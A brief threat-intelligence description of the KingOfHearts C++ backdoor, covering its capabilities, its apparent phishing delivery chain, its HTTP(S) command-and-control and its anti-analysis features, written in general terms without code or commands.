KingOfHearts is a backdoor written in C++ that is part of an unnamed sophisticated threat actor's toolset. The same group of hackers has been observed to be using three different malware families in their operations. One such family called SlothfulMedia was the subject of a report published by the Department of Homeland Security CISA agency.
At its core, KingOfHearts is equipped with all the basic functions expected from a backdoor threat without anything too fancy. It does have a custom utility for capturing screenshots, though. Apart from that, it can execute commands on the compromised computer, access the running processes list with the option to terminate any of them, as well as having file system manipulation capabilities.
KingOfHearts is most likely distributed through email phishing attacks with poisoned Word document attachments. Once executed, these documents initiate a PowerShell script tasked with the download of an image carrying a base-64 encoded malware payload. KingOfHearts has been observed as being dropped as both a '.exe' or '.dll' file. Communication with the Command-and-Control (C2, C&C) infrastructure is established through HTTP(S).
According to the researchers who analyzed it, KingOfHearts is equipped with anti-debugging and virtualization detection functionalities.